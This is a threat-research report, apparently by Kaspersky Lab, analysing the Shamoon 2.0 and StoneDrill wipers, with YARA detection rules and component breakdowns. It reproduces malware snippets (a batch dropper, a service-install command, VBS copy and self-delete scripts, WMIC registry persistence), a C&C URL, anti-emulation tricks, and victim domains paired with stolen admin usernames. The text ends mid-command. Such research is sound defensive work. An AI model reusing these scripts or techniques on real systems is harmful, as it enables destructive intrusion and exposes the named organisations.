StoneDrill:
Shamoon 2.0 includes a fully functional ransomware module, in addition to its common
wiping functionality.
Shamoon 2.0 has both 32-bit and 64-bit components.
The Shamoon samples we analyzed in January 2017 do not implement any command
and control (C&C) communication; previous ones included a basic C&C functionality that
referenced local servers in the victim
s network.
StoneDrill makes heavy use of evasion techniques to avoid sandbox execution.
While Shamoon embeds Arabic-Yemen resource language sections, StoneDrill embeds
mostly Persian resource language sections. Of course, we do not exclude the possibility
of false flags.
StoneDrill does not use drivers during deployment (unlike Shamoon) but relies on
memory injection of the wiping module into the victim
s preferred browser.
Several similarities exist between Shamoon and StoneDrill.
Multiple similarities were found between StoneDrill and previously analysed NewsBeef
attacks.
What is new in this report?
This report provides new insights into the Shamoon 2.0 and StoneDrill attacks, including:
1. The discovery techniques and strategies we used for Shamoon and StoneDrill.
2. Details on the ransomware functionality found in Shamoon 2.0. This functionality is
currently inactive but could be used in future attacks.
3. Details on the newly found StoneDrill functions, including its destructive capabilities
(even with limited user privileges).
4. Details on the similarities between malware styles and malware components
source
code found in Shamoon, StoneDrill and NewsBeef.
1. From Shamoon to StoneDrill: the discovery
1.1. Shamoon: It
s all about the
resources
Few people ever expected the return of Shamoon after four years of silence. This made the
news from the Middle East on 17 November 2016 quite surprising, and sent multiple
shockwaves through the industry. After the second wave of attacks, which took place on 29
November 2016, it became quite clear that Shamoon 2.0 was no longer an isolated incident, but
part of a new series of attacks and we should expect more waves coming in. In order to make
sure that Kaspersky Lab customers were protected, we started to develop specific detection
strategies and hunt for possible new variants.
To create the new detections, we used multiple ideas:
The Shamoon wipers have their additional payloads stored as encrypted resources.
Just like in 2012, the early Shamoon 2.0 samples used resources with three very
specific names - "PKCS7", "PKCS12" and "X509". Because of their uniqueness it was
relatively easy to find and detect them just by the resource names and their high
entropy. Unfortunately, newer versions had random resource names like "ICO", "LANG"
and "MENU", so the ability to easily find new samples was lost.
However, all programmers, especially malware writers, have their own habits, and the authors
of Shamoon are no exception:
Since the Shamoon 1.0 story, from 2012 (6dd571b84470ad9caad30a6a6acf491e) until
2016 (2cd0a5f1e9bcce6807e57ec8477d222a) many samples had one additional
encrypted resource with a specific, although non-unique name "101".
This finding got us thinking that the Shamoon attackers can re-use this pattern and we
investigated ways of using this to hunt for new, unknown malware generations from their side.
As researchers, we tested a lot of different approaches to find similar malicious samples based
on this artefact, and one of them worked unexpectedly. Here
s the logic we used to create the
detection:
1. We assumed that for the next waves of attack the authors would continue to recompile
the Shamoon 2.0 version from 2016, while trying to avoid AV detection, so we focused
mostly on the newest Shamoon versions.
2. We assumed that the wiper would again enumerate all files inside folders, so it would
still call Windows API functions FindFirstFile and FindNextFile.
3. Because it uses encrypted resources, we assumed that it would find and load them with
the Windows API functions FindResource and LoadResource.
4. Inside all known versions of Shamoon 2.0, the resource "101" was found, with the
following properties:
Level of entropy > 7.8 - that means the data inside is encrypted or compressed.
Size about 30 KB - we
ve decided to set the minimum limit at 20 KB.
Language = neutral (not set); all other resources had the languages "Arabic
(Yemen)" or "English United States".
Does not contain an unencrypted PE executable file inside.
After initial testing, we decided to add more search criteria to limit the number of possible false
positive detections:
Shamoon samples had no digital signature, so the sample would be unsigned.
All known Shamoon samples with resource "101" had a maximum file size of 370 KB, so
it's reasonable to limit the file size to twice that number - 700 KB.
The number of resources inside the sample should not be too high - less than 15.
Our favorite malware hunting tool, Yara, provides a rule-bused approach to create descriptions of
malware families based on textual or binary patterns.
Here
s the detection rule we wrote using all the above conditions:
import "pe"
import "math"
rule susp_file_enumerator_with_encrypted_resource_101 {
meta:
copyright = "Kaspersky Lab"
description = "Generic detection for samples that enumerate files with encrypted resource
called 101"
hash = "2cd0a5f1e9bcce6807e57ec8477d222a"
hash = "c843046e54b755ec63ccb09d0a689674"
version = "1.4"
strings:
$mz = "This program cannot be run in DOS mode."
$a1 = "FindFirstFile" ascii wide nocase
$a2 = "FindNextFile" ascii wide nocase
$a3 = "FindResource" ascii wide nocase
$a4 = "LoadResource" ascii wide nocase
condition:
uint16(0) == 0x5A4D and
all of them and
filesize < 700000 and
pe.number_of_sections > 4 and
pe.number_of_signatures == 0 and
pe.number_of_resources > 1 and pe.number_of_resources < 15 and
for any i in (0..pe.number_of_resources - 1):
(math.entropy(pe.resources[i].offset, pe.resources[i].length) > 7.8) and
pe.resources[i].id == 101 and
pe.resources[i].length > 20000 and
pe.resources[i].language == 0 and
not ($mz in (pe.resources[i].offset..pe.resources[i].offset + pe.resources[i].length))
While running the above Yara rule on Kaspersky Lab
s samples selection, we found an
interesting, fresh sample. After a quick analysis, we realized it was yet another wiper. However,
it was not Shamoon, but something different. We
ve decided to call it StoneDrill.
1.2. From StoneDrill to NewsBeef
Having identified the StoneDrill sample through the Yara technique above, we started looking
for other possibly related samples.
One Yara technique that has proved useful in the past for finding new malware variants is the
development of Yara rules for decrypted malware components. During attacks, malware
components can be changed to fit the attackers
requirements, so hunting for decrypted
malware code might help in finding new malware variants or even older samples.
With StoneDrill, we developed several Yara rules for the decrypted payloads. Here
s one of our
Yara rules for a decrypted StoneDrill module:
rule StoneDrill_main_sub {
meta:
author
= "Kaspersky Lab"
description = "Rule to detect StoneDrill (decrypted) samples"
hash
= "d01781f1246fd1b64e09170bd6600fe1"
hash
= "ac3c25534c076623192b9381f926ba0d"
version
= "1.0"
strings:
$code = {B8 08 00 FE 7F FF 30 8F 44 24 ?? 68 B4 0F 00 00 FF 15 ?? ?? ?? 00 B8 08 00 FE 7F FF
30 8F 44 24 ?? 8B ?? 24 [1 - 4] 2B ?? 24 [6] F7 ?1 [5 - 12] 00}
condition:
uint16(0) == 0x5A4D and
$code and
filesize < 5000000
Interestingly, this rule allowed us to find a new category of samples, which we previously
connected with a threat actor named NewsBeef. We wrote about NewsBeef roughly one year
ago, in relation to another set of attacks against oil and energy companies from the Middle East.
Further analysis indicated the malware samples from StoneDrill and NewsBeef appear to be
connected together through numerous internal similarities.
The use of simple logic in conjunction with a knowledge of Yara can help attain a state-of-the-art
outcome in malware hunting activity. If you would like to learn more, you can join us for the Yara
training "Hunt APTs with Yara like a GReAT Ninja" and the advanced
Malware Reverse
Engineering course
on April 1-2, 2017 in St. Maarten.
Several private intelligence reports on Shamoon, StoneDrill and NewsBeef are available to
subscribers of Kaspersky Lab
s Private Intelligence Reports.
For more information please contact: intelreports@kaspersky.com
2. Technical details - Shamoon 2.0 - language
usage and possible Yemeni links
Several good technical articles on Shamoon 2.0 have been published by some of our
colleagues, including Palo Alto, IBM X-Force, Symantec and others.
Throughout this blog we describe some of the technical details of the new Shamoon 2.0 attacks
and what are the most important things that make them stand out. For the analysis we used the
earliest set of samples, with a hardcoded attack date of 17 November 2016. However, we
also included details from the newer samples, such as hardcoded credentials.
During deployment in the victim
s environment, the main Shamoon 2.0 wiper module is installed
through a Windows Batch file with the following content:
@echo off
set u100=ntertmgr32.exe
set u200=service
set u800=%~dp0
copy /Y "%u800%%u100%" "%systemroot%\system32\%u100%" start /b %systemroot%\system32\%u100%
%u200%
Interestingly, the sample resources appear to have a language ID of
Arabic (Yemen)
suggesting the attackers might be from Yemen. Of course, we should not disregard the
possibility that the resource language could be a false flag planted there by the attackers.
2.1. 32-bit Shamoon dropper/worm (ntssrvr32.exe)
SHA256
394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b
5446f46d89124462ae7aca4fce420423
Compiled 2009.02.15 12:31:44 (GMT), VC 2010
Type
I386 Console EXE
Size
1 349 632 bytes
This executable is a worm designed to infect computers connected to a Windows domain. To
achieve this, it relies on a list of hardcoded, previously stolen username/password pairs
belonging to administrators of the targeted domain. All the strings in the malware are obfuscated
with simple one byte ADD operations and are decrypted upon execution. All the dropped files
exhibit file times altered to match that of the system
s kernel32.dll. The module only works if it
is run with exactly one command line parameter, regardless of the parameter. Otherwise, it
simply exits (likely a measure to avoid accidental execution).
The hardcoded credentials we have observed so far are:
Domain name
Username
Domain name
Username
Domain
name
Username
GACA
gacaadmin15
CRISTALGLOBAL
ckadmin
SAICO
administrator
gacaadmin22
jaladmin
muneeb
mukhsx01
beadmin
Administrator
pgSCMADM
crmadmin
ALAB.local
admin
mnxxnadmin
tvcenter
GNET and
saud.a2
thirnx01
khaleel
Habib1
pamadmin1
mhamdi
shokax00
mawale
alqifaria
backupadmn
spadmin
gacaadmin08
cloudsvc
SIPA
SIDF
administrator
SCSB
qomari.a
ucam01
shabbir
administrator
tsfarooq
aalshamari
bbadmin
CLIUSR
nbu_service
CUCMUser
administrator
UnityDirSvc
email4
UnityMsgStoreSvc
TESTDOMAIN
.COM
SADARA
test123
YAMSTEEL
Administrator
RIYADH
faxserver
citrbass
test456
yidadm
If the victim host
s system
PROCESSOR_ARCHITECTURE
environment variable is
AMD64
amd64
, the module installs its 64-bit variant. The variant is contained within a resource
named
X509
. The resource is de-XORed and dropped onto the system under:
<%WindowsDir%\system32\ntssrvr64.exe>.
It is then installed as a service via the command:
cmd.exe /c "ping -n 30 127.0.0.1 >nul && sc config NtsSrv binpath=
"C:\WINDOWS\system32\ntssrvr64.exe LocalService" && ping -n 10 127.0.0.1 >nul && sc start NtsSrv
2.1.1. Installation as a Service
If the malware is running on a 32-bit system, this module installs itself as a service named
NtsSrv
Name
NtsSrv
Display Name
Description
Microsoft Network Realtime
Inspection Service
Helps guard against time change attempts targeting known
and newly discovered vulnerabilities in network time protocols
The service is set as dependent on the
RpcSs
system service. The properties of the system
service
LanmanWorkstation
are changed so that it depends on the newly created
NtsSrv
service to allow it to start after the malware.
2.1.2. Worm Functionality
Once this module runs (as a service), the worm-spreading functionality is started, targeting
every network host within the IPv4 address range, with the same first three bytes of the victim
IP and the last byte in the range from 0 to 255, thus operating inside subnet class C (a.b.c.0/24).
Here
s how it works:
1. The worm connects to a remote machine
s registry and disables Remote UAC by setting
the LocalAccountTokenFilterPolicy registry key value to 1 in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\system.
2. If the RemoteRegistry system service is disabled and doesn't run on the target system,
the worm reconfigures this service to be auto-started and then starts it immediately. If
the connection to a remote registry is unsuccessful, the worm repeats the connection
attempt with a hardcoded set of stolen domain administrator credentials. The worm then
searches for remote
\windows\system32\csrss.exe
files by prepending this path with
the victim machine
s IP as well as system shares: "ADMIN$", "C$", "D$", "E$".
3. Once a remote system32 folder is found, the worm copies itself into this folder under the
name
ntssrvr32.exe
. It schedules a remote job to run
ntssrvr32.exe LocalService
after 90 seconds.
4. If the remote scheduler is inaccessible, the worm tries to set up NtsSrv and runs the
service on the remote machine with the same parameters as it used for self-installation.
Attempts with stolen credentials are also performed.
5. An alternative but similar infection method is coded into the worm, where each infection
is performed in a separate thread without relying on the scheduler; but it is not used at
this time.
2.1.3. Command and Control (C&C) Module
After replication, the malware runs a command-and-control communication module. This
module is contained within a resource named
Pkcs7
. It is de-XORed and dropped as
<%WindowsDir%\system32\netinit.exe>. Using the hardcoded credentials, it creates a
Windows Task Scheduler job that executes netinit.exe 90 seconds after creation. It waits 95
seconds and then deletes the scheduled job.
2.1.4. Wiper and Encryptor Module
Finally, the malware drops the wiper/encryptor module. This module first checks if it
s time to
run the main payload. The activation period can be set in two ways:
1. It checks if the system time is not earlier than the time specified in the following file:
<%windir%\inf\usbvideo324.pnf>
2. If the file doesn
t exist, it checks that the system time is not earlier than the hardcoded
date: <20:45, 17 Nov 2016>
At the specified time, the malware drops two files:
The first file, is unused in this attack and contains a
public encryption key. This is an indicator that the attackers might be using Shamoon as a
ransomware tool in upcoming waves.
-----BEGINPUBLICKEY----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAusZItknNNeV+xjPzIZLyB5m6gaNREC6I3CZQ7F1vDU
CaGki83s6JVDo2NGN70mhx4q5NJrgXDzD7McpxDoJsDkKwr5mm3yEs9vmZwHcEWcvU6QbJguFgPJk6zoatVq0
WsfIkN50ywQMVq2zmiJel2UoalPJzCWbAYG0BShXjnlcsfV8GcPW+fNRCSGKVue3RE6cV5HlAjSD8VSk4KERPu
Wfvbk/pP0qDE60Uc7K3Bl7uxbHVB2g8unuj8B9d81TKT0hForie8V2N4FT0bdAHUHU6LT/XtAdLCp9/cTUf8zk1MC
oxXj6CSg9xKgGgnJazC/u3R0nm/pPriF/ZkwrVhJtDd/1nf4JC1sDmc3mgv0hI+7hthf+fZkv75doHg67Gg6JOZQIMytQ
eF8ylnUgC1ZyrAmaxN0OV69zhktzZISdmmkbtyZSHEZzIdC9PF/MJzCK5ylkEI2jQpAabgv34o2o+ZMJLSDZbNrXy9
0LUy8GjtzJYmv02MVLjy7CSgglIbulSgMP4QC/i1fTIPhlSlMyCKnGIKdKY31KFQnoOzI8kudeted8eF/ubpFcna0TDc
Ek+Dt8s4pN4/DsGQoncWg9HMyC8Q/MWIE/JuOCisovJ0PYq2aKetDNRMm7THcXalXKD9RpczObRWKGKzMJD
onmBm2AETME74MRPmC/FWgsCAwEAAQ==
-----ENDPUBLICKEY-----
The second file is dropped from a resource named
PKCS12
. It is de-XORed and dropped into
the %system% directory with a name randomly selected from the following list:
caclsrv.exe
dvdquery.exe
msinit.exe
sigver.exe
wcscript.exe
certutl.exe
event.exe
ntfrsutil.exe
routeman.exe
ntnw.exe
clean.exe
findfile.exe
ntdsutl.exe
rrasrv.exe
netx.exe
ctrl.exe
gpget.exe
power.exe
sacses.exe
fsutl.exe
dfrag.exe
ipsecure.exe
rdsadmin.exe
sfmsc.exe
extract.exe
dnslookup.exe
iissrv.exe
regsys.exe
smbinit.exe
The dropped payload is then scheduled to run in the same way as the C&C communication
module. We describe it in detail below.
2.2. 64-bit Shamoon Dropper (ntssrvr64.exe)
SHA256
47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34
8fbe990c2d493f58a2afa2b746e49c86
Compiled 2009.02.15 12:32:19 (GMT), VC 2010
Type
AMD64 Console EXE
Size
717 312 bytes
This dropper has the same functionality as the 32-bit variant. This version is contained within a
resource named
X509
. The resource is de-XORed and dropped onto the system under:
<%WindowsDir%\system32\ntssrvr64.exe>.
2.2.1. C&C Communication Module (netinit.exe)
SHA256
61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842
5bac4381c00044d7f4e4cbfd368ba03b
Compiled 2009.02.15 12:29:20 (GMT), VC 2010
Type
I386 Console EXE
Size
159 744 bytes
SHA256
772ceedbc2cacf7b16ae967de310350e42aa47e5cef19f4423220d41501d86a5
ac4d91e919a3ef210a59acab0dbb9ab5
Compiled 2009.02.15 12:29:41 (GMT), VC 2010
Type
AMD64 Console EXE
Size
183 808 bytes
The strings in the C&C module are obfuscated by simple ADD operations and are decrypted
upon execution. This module periodically connects to a C&C with the following URL:
hxxp://server/category/page.php?shinu=w74K9/xQp1VjJfwwadq4HCl7VheuQXk49YnNkb
XR+0ghrH YIRFE51FQskZya+jIPqo3VlOEpfvvgxvO26pZ3oA==
The strange
server
in the URL string suggests multiple possibilities:
1. It is used by mistake.
2. It may suggest a placeholder value that wasn
t set for the purposes of this attack.
3. A server with this name might be installed by the attackers somewhere inside the local
network.
4. The local network may rely on a now poisoned DNS server.
The string also contains the word
shinu=
, which is quite interesting. This is possibly a
transliteration of the Gulf Arabic slang word
for
what?
. This particular slang is used in
several countries, notably Iraq, but also sometimes in Kuwait and Bahrain. The
shinu
parameter string contains the following encoded information about the victim system:
Host IP and MAC addresses
Windows version information
Windows input locale IDs (keyboard layouts)
Number of connection attempts, or content of the <%WINDIR%\inf\netimm173.pnf> file
if the file exists. The file contains information about changes made by
the wiper payload module.
If the direct connection fails, this module tries to connect using a hardcoded proxy server of
1.1.1.1:8080
. This supports the assumption that the malware deployed in this case does not
include a working C&C and the operators used a raw, unconfigured C&C module.
Data received from the C&C server is handled in two possible ways:
1. An executable file is downloaded as <%TEMP%\Temp\filer%rndDigits%.exe> and
executed immediately thereafter.
2. A file is dropped in <%WINDIR%\inf\usbvideo324.pnf> that contains the wiper
payload
s activation time. This effectively allows the attackers to configure the wiper time
bomb.
2.2.2. Disk Wiper/Encryptor Module
SHA256
128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd
2cd0a5f1e9bcce6807e57ec8477d222a
Compiled
2009.02.15 12:30:19 (GMT), VC 2010
Type
I386 Console EXE
Size
282 112 bytes
SHA256
c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a
c843046e54b755ec63ccb09d0a689674
Compiled
2009.02.15 12:30:41 (GMT), VC 2010
Type
AMD64 Console EXE
Size
327 680 bytes
Despite the widespread coverage of the resurgence of the Shamoon wiper, few have noted the
new ransomware functionality. The wiper module of Shamoon 2.0 has been designed to run as
either a wiper or an encryptor (ransomware).
1. The module is configured to wipe the disk using the
Death of Alan Kurdi
photo. The
picture depicts a three-year-old Syrian refugee who drowned as his family attempted to
reach Europe and travel on to Canada. The module can also be configured to wipe the
disk using random data.
2. In the
encryption/ransomware
mode, a weak pseudo-random RC4 key is generated,
which is further encrypted by the RSA public key and stored directly on the hard drive (at
<\Device\Harddisk0\Partition0>) starting at offset 0x201, right after the master boot
record.
3. Once the module is extracted, it drops a legitimate driver named to the
disk and starts it. This driver is used for low-level disk operations and is well known from
previous Shamoon attacks. Before accessing this driver, the system date is changed to
a random day between the 1st and 20th of August, 2012 to fool the driver
s license
checks and evaluation period.
4. The payload employs the file <%WINDIR%\inf\netimm173.pnf> to keep track of the
operations performed. The content of this file is sent to the C&C server by the
communication module.
5. The strings in this module are also obfuscated by simple ADD operations and decrypted
at start.
2.2.3. Payload Configuration
There are two 25-byte length configuration strings in the wiper payload:
SPPPPPPPPPMPPHHHHHHHHHHBO
NNNNNNNNNNWNNNNNNNNNNNWWW
Letters in the first string specify a type of operation to be performed, with the available operations
explained below. The second string designates how these operations should be performed: the letter 'N'
means that the operation will be executed synchronously in separate threads, the letter 'W' means the
operation will wait until a previous step is completed.
Here
s an explanation of the configuration string above:
Letter
Operation
The first operation, marked by the letter 'S' wipes (or encrypts) the content of the Shamoon
2.0 components (netinit.exe, ntssrvr32.exe, and wiper module itself). Using the low-level disk
access driver makes it possible to wipe the body of a running executable.
The next 9 'P' letters indicate wiping (or encrypting) of the files placed inside the traditional
user folders: desktop, download, document, desktop, download, document, picture, video,
and music.
The 'M' wipes (or encrypts) the NTFS MFT data on all accessible drives mapped from A: to
Z:, except the system drive.
The next two 'P' letters wipe (or encrypt) files inside the following folders:
and
The 10 'H' letters wipe (or encrypt) some of the partitions from 9 to 0 on hard disks 9-0
(SystemBoot and FirmwareBootDevice partitions and partition 0 on the system drive are
skipped in this step)
The 'B' letter wipes (or encrypts) part of the partition designated as FirmwareBootDevice
The final 'O' wipes (or encrypts) the Master File Table on the system drive, the first sector of
\Device\Harddisk0\Partition0, and the last part of the SystemBootDevice partition.
Two minutes after all tasks are completed, the system is rebooted with the following command:
shutdown -r -f -t 2
2.2.4. Low-Level Disk Access Driver (DRDISK.SYS)
SHA256
4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6
1493d342e7a36553c56b2adea150949e
Compiled 2011.12.28 16:51:24 (GMT), VC 2005
Type
I386 Native
Size
27 280 bytes
SHA256
eaee62a8238189e8607b24c463a84c83c2331a43b034484972e4b302bd3634d9
42f883d029b47f9d490a427091da3f5d
Compiled 2011.12.28 16:51:29 (GMT), VC 2005
Type
AMD64 Native
Size
31 998 bytes
These signed legitimate drivers form part of the EldoS RawDisk product. This product is
designed to provide direct access to disks and protected files from user-mode applications.
Sadly, this functionality has been adopted and abused by multiple threat actors to develop wiper
malware, as in the case of the original Shamoon or the Lazarus Destover malware used in the
infamous Sony Pictures Entertainment attack of 2014. In order to bypass the EldoS RawDisk
drivers
evaluation period license checks, the Shamoon 2.0 malware changes the system date
to a random day between the 1st and 20th of August, 2012.
2.3. From Shamoon 2.0 to StoneDrill 1.0
StoneDrill has some style similarities to the previously discovered Shamoon samples.
Particularly interesting is the heavy use of anti-emulation techniques in the malware, which
prevents the automated analysis by emulators or sandboxes.
One of the most interesting characteristics is the presence of the Persian language in multiple
resource sections.
Samples of the StoneDrill malware were uploaded multiple times to multiscanner systems from
Saudi Arabia between 27 and 30 November 2016. One StoneDrill victim was also observed in
the Kaspersky Security Network (KSN) in Europe.
2.4. The StoneDrill wiper
SHA256
62aabce7a5741a9270cddac49cd1d715305c1d0505e620bbeaec6ff9b6fd0260
0ccc9ec82f1d44c243329014b82d3125
Compiled 1999.02.08 06:15:47 (GMT) fake, VC 2015
Type
I386 GUI EXE
Size
195072 bytes
The malware PE file timestamp is fake; however, the authors forgot to alter a timestamp inside
the debug directory. The real timestamp from the debug directory points to: 2016.11.14
21:16:45
1. The module highlighted above starts from a heavy anti-emulation function that contains
numerous WinAPI calls with invalid parameters. The goal is to break through the
detection of antivirus emulators and heuristic detection.
2. The second anti-emulation technique is run before the payload execution: this module
creates a hidden dialog window, then finds and programmatically clicks the
button
on that dialog. After that, another series of incorrect WinAPI calls follow.
3. The malware then finds the file path of the default Internet browser app by looking into
the following registry keys:
a. SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\Us
erChoice
b. HKCR\%ProgId_val%\shell\open\command
4. The malware then checks to ensure the browser is not LaunchWinApp.exe or is
compiled for the 64-bit architecture, in which case the path of
%PROGRAM_FILESX86%\Internet Explorer\iexplore.exe
is used instead.
5. The default browser is then started and the wiper module is injected into the running
browser memory.
6. After the successful start of the wiper module, the following script is dropped and
executed:
%temp%\C-Dlt-C-Org-T.vbs
7. Another temporary file is dropped
%temp%\C-Dlt-C-Trsh-T.tmp
which contains the
name of the Injector module; this file is deleted after execution is completed.
WScript.Sleep(10 * 1000)
On Error Resume Next
Set WshShell = CreateObject("Scripting.FileSystemObject")
While WshShell.FileExists("%selfname%")
WshShell.DeleteFile "%selfname%"
Wend
WScript.Sleep(10 * 1000)
WshShell.DeleteFile "%temp%\C-Dlt-C-Org-T.vbs"
Set WshShell = Nothing
%temp%\C-Dlt-C-Org-T.vbs File contents
2.4.1. The StoneDrill Disk Wiper Module
SHA256
bf79622491dc5d572b4cfb7feced055120138df94ffd2b48ca629bb0a77514cc
697c515a46484be4f9597cb4f39b2959
Compiled 2016.11.14 21:16:40 (GMT), VC 2015
Type
I386 GUI EXE
Size
130 560 bytes
Unlike Shamoon, the StoneDrill disk wiper module is not written onto disk but instead is injected
directly into the user
s preferred browser process memory. This module inherits the second anti-
emulation trick only (clicking the button on the hidden dialog window); it is also obfuscated with
the same alphabet-based string encryption. If the browser process privileges do not permit the
raw disk wiping, only the user-accessible files are deleted.
Depending on the configuration, this module wipes with random data one of following possible
targets:
All accessible physical drives by using the device path
\\.\PhysicalDrive
All accessible logical drives by using device path
\\.\X:
Recursively wipes and deletes files in all folders except
Windows
on all accessible
logical drives
Places a special emphasis on wiping files named
asdhgasdasdwqe%digits%
in the
root folder of the disk.
Just like Shamoon, after the wipe process is completed, the system is rebooted.
2.5. The StoneDrill backdoor
According to the PE timestamps from StoneDrill sample two and sample one (2016.10.19 and
2016.11.14 respectively), this malware file was compiled a month before the previously
described StoneDrill sample. However, internally this tool wrapper (injector) looks like a more
modern evolution of the previously discussed wiper wrapper.
The sample is generally of low quality, with many unused code blocks, unreliable anti-emulation
and few non critical bugs. In some cases functions are executed but the results are not used:
Is the current user a domain administrator?
Is the antivirus process currently running?
Is the current process running in a virtual environment such as VMware or VirtualBox?
2.6. The StoneDrill Installer/Injector module
SHA256
69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db
ac3c25534c076623192b9381f926ba0d
Compiled
2016.10.19 14:26:01 (GMT), VC 2015
Type
I386 GUI EXE
Size
195072 bytes
2.6.1. First step: anti-emulation tricks
This module is very similar to the above discussed injector module, utilizing the same set of
anti-emulation tricks, injection into the user
s preferred browser and VBS scripts. A distinction in
this sample is the wide utilization of the WMI command-line (WMIC) utility to run tasks such as
running the dropped VBS script or making registry modifications.
Strings in this module are encrypted in two ways:
Alphabet replacement
SSE XOR 0x5235
2.6.2. Second step: name construction and installation
This module checks if it is already running from the
%COMMON_APPDATA%\Chrome
folder.
In cases where the malware is started from a different folder, the installation procedure is
started.
During installation, a name is constructed through concatenation of three randomly selected
strings from the below three sets, for example - PowerNetworkProxy, RAMFirewallTransfer,
LocationAgentFramework:
Set1
Set2
Set3
Intel, AMD, Microsoft, Windows, Java, Adobe, Cisco, SunGard, Query, Location, Power, NFC, DotNet,
MFC, WMI, SQL, Office, Bitlocker, Map, Fingerprint, Packet, Registery, RAM, CPU, ROM, Memory,
Monitor, CDROM, Run-time, Task, Ethernet, Application, Lockscreen, Cloud, Browser, Cash, Desktop,
Display
File, System, Service, Device, Software, Hardware, VM, Network, Performance, Graphic, Engine, Agent,
Data, Wizard, Server, Media, History, Storage, Core, boot, Gaming, Firewall
Manager, Arranger, Controller, Host, Help, Diagnostics, LogOn, Plug, Proxy, Events, Transfer, Policy,
Recovery, Details, Provider, Adapter, CleanUp, Encryption, Extention, APP, Client, Menu, Stub,
Execute, Luncher, Framework, Tester, Model, Backup, API
The VBS script
%TEMP%\C-PDC-C-Cpy-T.vbs
is then dropped in %TEMP%\
On Error Resume Next
Set WshShell = CreateObject("Scripting.FileSystemObject")
WshShell.CopyFile "%SELF_NAME%" , "%COMMON_APPDATA%\Chrome\%SELECTED_NAME%.exe"
Set WshShell = Nothing
C-PDC-C-Cpy-T.vbs body template
The script is executed using the following command to do self-copy into the
%COMMON_APPDATA%\Chrome
folder:
cmd /c WMIC Process Call Create "C:\Windows\System32\Wscript.exe //NOLOGO %TEMP%\C-PDC-C-CpyT.vbs"
Another VBS script named
C-PDI-C-Cpy-T.vbs
is dropped into %TEMP% folder and executed
in the same method (via WMIC used to make a second malware copy with pathname)
C:\ProgramData\InternetExplorer\%SELECTED_NAME%Stp.exe
On Error Resume Next
Set WshShell = CreateObject("Scripting.FileSystemObject")
WshShell.CopyFile "%COMMON_APPDATA%\Chrome\%SELECTED_NAME%.exe" ,
"C:\ProgramData\InternetExplorer\%SELECTED_NAME%Stp.exe"
C-PDI-C-Cpy-T.vbs body template
Pathnames of these two VBS files as well as the initial malware pathname are written into
%TEMP%\C-Dlt-C-Trsh-T.tmp file.
At the end of the installation procedure the copy of malware (found in
%COMMON_APPDATA%\Chrome\%SELECTED_NAME%.exe
) is executed (via
cmd /c
wmic process call create
) and the initial process terminates itself.
2.6.3. Third step
When the malware is started from within the
%COMMON_APPDATA%\Chrome
folder, the
FileInfo.txt
file is created in the same folder and contains the pathname of the first copy of
malware (
%COMMON_APPDATA%\Chrome\%SELECTED_NAME%.exe
Then the third copy of the malware is created by the command
%COMSPEC% /c copy
"%SELFNAME" %TEMP%\bd891.tmp
, which checks the target file to verify if command
execution is successful, then deletes the bd891.tmp file. The last mentioned is used as another
anti-emulation trick in the StoneDrill arsenal.
2.6.4. Fourth step: Payload injection
The payload is extracted from the resources section, decrypted and unpacked similarly to the
previously described wiper injector module. The difference here is that for the decryption of the
payload module, SSE instructions are used.
In the same style, the payload is injected into the user preferred browser process, with an
additional step after the payload module injection: the resource segment responsible for the
payload configuration is replaced in memory with the resource taken from the parent module.
After the payload start is attempted, the VBS files listed inside C-Dlt-C-Trsh-T.tmp and C-DltC-Trsh-T.tmp are deleted.
2.6.5. Fifth step: If not started
If the payload is not started, then %TEMP%\C-Dlt-C-Org-T.vbs is dropped and executed to
delete initial malware copy.
WScript.Sleep(10 * 1000)
On Error Resume Next
Set WshShell = CreateObject("Scripting.FileSystemObject")
While WshShell.FileExists("%initial_malware_pathname%")
WshShell.DeleteFile "%initial_malware_pathname%"
Wend
WScript.Sleep(10 * 1000)
WshShell.DeleteFile "%TEMP%\C-Dlt-C-Org-T.vbs"
Set WshShell = Nothing
2.7. StoneDrill remote access payload module
SHA256
105ee777ad31a58301310719b49c7b6a7e957823e4dabbfeaa6a14e313008c1b
e3a82d1db3ae8b189d2e1e0a22d6c82f
Compiled 2016.10.19 16:49:36 (GMT), VC 2015
Type
I386 GUI EXE
Size
317 440 bytes
Version
2.0.1610.76
This module is not dropped into disk but injected directly into the user preferred browser
process memory. The module is written in C++ with the use of STL classes, with numerous
forgotten debug strings.
2.7.1. First step: Decryption
Strings in this module are encrypted by ROR, NEG, ADD or simply XOR. An unreliable antiemulation technique is utilized which makes the whole module unstable. The author assumed
that the execution of the Sleep function with parameter 4020 milliseconds would increase the
system value of KUSER_SHARED_DATA::InterruptTime to four seconds (rounded to the
nearest second). If the InterruptTime is increased only by two seconds this module just exits
immediately. In case of other values, the module will crash due to the incorrect decryption of
strings.
The configuration block is then loaded from resources and decrypted by two passes of XOR.
The original module configuration resource is empty - the injector module just patches this
resource, replacing the configuration with its own. In the configuration block,
and
are
the C&C servers,
is part of the connection query and seems to be a client ID.
2.7.2. Second step: Registering autorun of installer (injector) module
The malware reads and de-XORs content of the
C:\ProgramData\InternetExplorer\FileInfoStp.txt file, then deletes and unregisters the
autorun file defined in FileInfoStp.txt (autorun key deleted from registry) with the command:
cmd /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Stp /f
Next, the file C:\ProgramData\InternetExplorer\FileInfoStp.txt is deleted and replaced by the
command:
cmd /c Copy /Y "C:\ProgramData\Chrome\FileInfo.txt" "C:\ProgramData\InternetExplorer\FileInfoStp.txt"
The malware then drops and executes file %TEMP%\C-Strt-C-Up-T.bat
ping 1.0.0.0 -n 1 -w 20000 > nul
@ECHO OFF
wmic /NameSpace:\\root\default Class StdRegProv Call SetStringValue hDefKey = "&H80000001"
sSubKeyName = "Software\Microsoft\Windows\CurrentVersion\Run" sValue =
